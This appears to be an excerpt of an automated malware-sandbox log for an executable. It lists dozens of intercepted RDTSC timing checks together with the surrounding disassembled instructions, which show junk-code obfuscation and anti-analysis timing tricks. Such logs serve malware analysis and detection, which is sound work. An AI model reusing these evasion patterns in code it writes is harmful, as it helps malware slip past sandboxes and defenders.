Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71BCEB second address: 71BCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71AD67 second address: 71AD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71BCF1 second address: 71BD5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F772874F646h 0x00000008 jmp 00007F772874F640h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F772874F638h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jmp 00007F772874F648h 0x0000002f push 00000000h 0x00000031 or dword ptr [ebp+12475673h], eax 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D1962h], edx 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 jo 00007F772874F63Ch 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71BEE4 second address: 71BF06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71BF06 second address: 71BF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71E06D second address: 71E077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F77291E5956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71E077 second address: 71E07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71EF18 second address: 71EF40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F77291E5962h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jns 00007F77291E5964h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71FE39 second address: 71FE4A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F772874F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71EF40 second address: 71EFE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F77291E5956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F77291E5964h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, 10D77F08h 0x0000001c jnl 00007F77291E595Ch 0x00000022 mov edi, dword ptr [ebp+122D307Ch] 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov di, 5A92h 0x00000033 mov eax, dword ptr [ebp+122D03F1h] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F77291E5958h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 mov dword ptr [ebp+122D3862h], edx 0x0000005b nop 0x0000005c ja 00007F77291E5968h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jno 00007F77291E5967h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 720C0E second address: 720C6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F772874F63Bh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F772874F638h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+12491EC4h], edx 0x0000002e mov ebx, 1F151DE5h 0x00000033 push 00000000h 0x00000035 mov ebx, esi 0x00000037 mov di, si 0x0000003a push 00000000h 0x0000003c or edi, 7C3B768Bh 0x00000042 push eax 0x00000043 jc 00007F772874F644h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71FE4A second address: 71FE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721CCE second address: 721CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721CD2 second address: 721CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721CD6 second address: 721D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx edi, dx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F772874F638h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 movsx edi, si 0x0000002c push 00000000h 0x0000002e jnc 00007F772874F63Ch 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721D20 second address: 721D26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721D26 second address: 721D2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 720E2E second address: 720E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721D2B second address: 721D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F772874F63Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 724AB6 second address: 724ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 724ABC second address: 724AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F772874F640h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 726BBB second address: 726BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 724D18 second address: 724D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 721F2E second address: 721F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F77291E5956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 726DD9 second address: 726DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F772874F636h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 728EF9 second address: 728EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 728EFD second address: 728F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 731EB8 second address: 731EFB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F77291E5956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F77291E5961h 0x0000000f pushad 0x00000010 jmp 00007F77291E5968h 0x00000015 jmp 00007F77291E595Bh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 731EFB second address: 731F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d jmp 00007F772874F643h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73161A second address: 73164A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E5966h 0x00000009 jp 00007F77291E5956h 0x0000000f jnc 00007F77291E5956h 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 731A4F second address: 731A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F772874F636h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F772874F643h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7360F2 second address: 73611B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F77291E5970h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73611B second address: 73612F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F772874F640h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73612F second address: 73613E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F77291E5956h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73613E second address: 736144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 736144 second address: 73614A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73DFD6 second address: 73DFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73E758 second address: 73E767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F77291E595Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73E767 second address: 73E7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F772874F648h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F772874F648h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73E7A2 second address: 73E7D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F77291E5967h 0x0000000f jmp 00007F77291E595Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73EBB6 second address: 73EBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73EBBA second address: 73EBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73EBBE second address: 73EBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F772874F63Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73EBD2 second address: 73EC26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F77291E5965h 0x00000008 jmp 00007F77291E5960h 0x0000000d pop eax 0x0000000e jmp 00007F77291E5967h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F77291E595Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 73EC26 second address: 73EC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F772874F636h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7473E8 second address: 747400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F77291E5962h 0x0000000c js 00007F77291E5956h 0x00000012 jne 00007F77291E5956h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747400 second address: 747425 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F772874F63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F772874F643h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747425 second address: 747429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74758A second address: 74759A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jnp 00007F772874F636h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74759A second address: 7475A4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F77291E5968h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747920 second address: 747924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747924 second address: 747928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747928 second address: 74792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74792E second address: 747939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747C2E second address: 747C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747C36 second address: 747C5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F77291E5956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ecx 0x0000000c jmp 00007F77291E5968h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747DC5 second address: 747DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F772874F636h 0x0000000a jl 00007F772874F636h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747F88 second address: 747F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747F8C second address: 747F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747F90 second address: 747F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747F96 second address: 747FC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F772874F636h 0x00000010 jc 00007F772874F636h 0x00000016 jp 00007F772874F636h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 jmp 00007F772874F63Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747FC7 second address: 747FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74815A second address: 748164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 748164 second address: 748168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7482C3 second address: 7482CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 748419 second address: 74841D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74841D second address: 748442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F772874F636h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 748442 second address: 748446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 748446 second address: 74844C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7470FF second address: 747106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 747106 second address: 74715A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F772874F653h 0x00000008 jnl 00007F772874F636h 0x0000000e jmp 00007F772874F647h 0x00000013 jmp 00007F772874F646h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F772874F63Dh 0x00000023 ja 00007F772874F636h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74715A second address: 747164 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F77291E5956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 74D043 second address: 74D06D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jo 00007F772874F636h 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F772874F636h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6C7EEC second address: 6C7EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6D20F3 second address: 6D20FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6D20FD second address: 6D2119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E5968h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6D2119 second address: 6D211F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 751760 second address: 751766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 751B81 second address: 751B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 756BE4 second address: 756BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 756BE8 second address: 756BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 756BEE second address: 756C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F77291E596Ah 0x0000000c pop edx 0x0000000d jl 00007F77291E5986h 0x00000013 push ebx 0x00000014 jmp 00007F77291E5962h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 755973 second address: 755977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70D2C6 second address: 70D2D0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F77291E5956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70D9B8 second address: 70D9C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70D9C5 second address: 70D9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70D9C9 second address: 70D9EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F640h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xchg eax, esi 0x0000000b mov dword ptr [ebp+122D215Dh], ecx 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
